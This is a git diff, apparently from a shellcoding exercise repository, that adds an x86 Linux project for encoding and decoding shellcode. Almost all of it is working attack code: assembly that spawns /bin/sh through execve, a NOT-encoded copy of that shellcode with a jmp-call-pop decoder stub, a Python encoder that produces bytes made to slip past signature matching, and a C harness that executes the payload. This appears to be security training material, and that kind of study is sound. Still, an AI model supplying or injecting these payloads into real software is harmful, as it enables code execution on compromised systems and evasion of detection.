kunalvarudkar
diff --git a/‎Shellcode/NOT_Encoder_Decoder/binsh
524 Bytes b/‎Shellcode/NOT_Encoder_Decoder/binsh
524 Bytes
diff --git a/‎Shellcode/NOT_Encoder_Decoder/binsh.nasm
+40 b/‎Shellcode/NOT_Encoder_Decoder/binsh.nasm
+40
diff --git a/‎Shellcode/NOT_Encoder_Decoder/binsh.o
464 Bytes b/‎Shellcode/NOT_Encoder_Decoder/binsh.o
464 Bytes
diff --git a/‎Shellcode/NOT_Encoder_Decoder/decoder
640 Bytes b/‎Shellcode/NOT_Encoder_Decoder/decoder
640 Bytes
diff --git a/‎Shellcode/NOT_Encoder_Decoder/decoder.nasm
+26 b/‎Shellcode/NOT_Encoder_Decoder/decoder.nasm
+26
diff --git a/‎Shellcode/NOT_Encoder_Decoder/decoder.o
592 Bytes b/‎Shellcode/NOT_Encoder_Decoder/decoder.o
592 Bytes
diff --git a/‎Shellcode/NOT_Encoder_Decoder/encoder.py
+28 b/‎Shellcode/NOT_Encoder_Decoder/encoder.py
+28
diff --git a/‎Shellcode/NOT_Encoder_Decoder/test
7.31 KB b/‎Shellcode/NOT_Encoder_Decoder/test
7.31 KB
diff --git a/‎Shellcode/NOT_Encoder_Decoder/test.c
+18 b/‎Shellcode/NOT_Encoder_Decoder/test.c
+18
@@ -0,0 +1,40 @@
+; binsh.nasm
+; Author: Kunal Varudkar
+; Develope a shellcode to execute /bin/sh
+
+
+global _start
+
+section .text
+
+_start:
+
+
+        ; push Null dword on the stack
+        xor eax, eax
+        push eax
+
+        ; push /bin//////sh in reverse order to stack (strlen=even)
+        push 0x68732f2f
+        push 0x2f2f2f2f
+        push 0x6e69622f
+
+        ; Moving //bin/sh to ebx register
+        mov ebx, esp 
+
+        ; push Null on stack
+        push eax
+
+        ; pointing esp to edx (envp[]=NULL)
+        mov edx, esp
+
+        ; push the address of //bin/sh stored in ebx
+        push ebx
+
+        ; point the top tof the stack to ECX[argv[]]
+        mov ecx, esp
+
+        ; call syscall
+        mov al, 0xb  ; or 11
+        int 0x80
+
@@ -0,0 +1,26 @@
+; decoder.nasm
+; Author: Kunal Varudkar
+; Development of NOT decoder
+
+
+global _start
+
+section .text
+_start:
+	jmp short call_decoder
+
+decoder:
+	pop esi
+	xor ecx, ecx
+	mov cl, 30 
+	
+decode:
+	not byte [esi]
+	inc esi
+	loop decode
+	
+	jmp short Shellcode	
+
+call_decoder:
+	call decoder
+	Shellcode: db 0xce,0x3f,0xaf,0x97,0xd0,0xd0,0x8c,0x97,0x97,0xd0,0xd0,0xd0,0xd0,0x97,0xd0,0x9d,0x96,0x91,0x76,0x1c,0xaf,0x76,0x1d,0xac,0x76,0x1e,0x4f,0xf4,0x32,0x7f 
@@ -0,0 +1,28 @@
+# encoder.py
+# Author: Kunal Varudkar
+# NOT encoder program for shellcode
+
+
+#!/usr/bin/python
+
+shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x2f\x2f\x2f\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")
+
+enc1 = ""
+enc2 = ""
+
+print 'Encoded Shellcode....'
+
+for x in bytearray(shellcode):
+	#Complement Encoding
+	y = ~x
+
+	enc1 += '\\x'
+	enc1 += '%02x' % (y & 0xff)
+
+	enc2 += '0x'
+	enc2 += '%02x,' % (y & 0xff)
+
+print enc1 + '\n'
+print enc2 + '\n'
+
+print 'Len: %d' % len(bytearray(shellcode))
@@ -0,0 +1,18 @@
+// test.c
+// Author: Kunal Varudkar
+// Test program to execute the shellcode
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char code[] = \
+"\xeb\x0c\x5e\x31\xc9\xb1\x1e\xf6\x16\x46\xe2\xfb\xeb\x05\xe8\xef\xff\xff\xff\xce\x3f\xaf\x97\xd0\xd0\x8c\x97\x97\xd0\xd0\xd0\xd0\x97\xd0\x9d\x96\x91\x76\x1c\xaf\x76\x1d\xac\x76\x1e\x4f\xf4\x32\x7f";
+
+main()
+{
+
+	printf("Shellcode Length: %d\n", strlen(code));
+	int (*ret)() = (int(*)())code;
+	ret();
+
+}